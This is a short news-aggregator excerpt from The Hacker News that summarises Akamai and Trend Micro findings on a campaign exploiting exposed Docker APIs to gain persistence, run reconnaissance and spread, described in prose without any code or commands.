"Akamai, which discovered the latest activity last month, said it's designed to block other actors from accessing the Docker API from the internet. The findings build on a prior report from Trend Micro in late June 2025, which uncovered a malicious campaign that targeted exposed Docker instances to stealthily drop an XMRig cryptocurrency miner using a TOR domain for anonymity."
"The attack chain essentially involves breaking into misconfigured Docker APIs to execute a new container based on the Alpine Docker image and mount the host file system into it. This is followed by the threat actors running a Base64-encoded payload to download a shell script downloader from a .onion domain. The script, besides altering SSH configurations to set up persistence, also installs other tools such as masscan, libpcap, libpcap-dev, zstd, and torsocks to conduct reconnaissance, contact a command-and-control (C2) server,"
Threat actors are exploiting exposed Docker APIs to execute Alpine containers that mount host file systems and run Base64-encoded payloads downloaded from .onion domains. The downloader script alters SSH configurations for persistence and installs reconnaissance and network tools including masscan, libpcap, libpcap-dev, zstd, and torsocks to contact a TOR-hosted C2 and retrieve a compressed binary. The initial dropper is a Go binary that embeds its payload, parses utmp to identify logged-in users, and may contain an emoji hinting at LLM-assisted creation. The campaign launches Masscan to find open Docker APIs on port 2375 and propagate to other hosts.
Read at The Hacker News
Unable to calculate read time
Collection
[
|
...
]